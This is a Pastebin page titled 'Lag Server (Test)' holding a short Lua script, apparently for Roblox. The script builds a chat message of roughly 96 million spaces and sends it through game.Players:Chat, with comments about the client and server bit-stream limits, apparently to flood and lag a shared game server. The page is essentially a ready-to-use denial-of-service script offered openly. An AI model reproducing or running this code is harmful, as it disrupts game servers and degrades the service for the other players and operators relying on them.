TNightmareHA

Lag Server (Test)

Mar 16th, 2022
1,087
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.25 KB | None | 0 0
  1. --Script made by #MLBB_0939. Testing if it works on 2022!
  2. --Method by Roblox
  3. local v =96000000 --Maximal bit stream on client
  4. -- (96000000 - 12) -- Maximal bit stream that server accept +-2
  5. local msg = ""..string.rep(" ",(v - 12))
  6. game.Players:Chat(msg)
Advertisement
Add Comment
Please, Sign In to add comment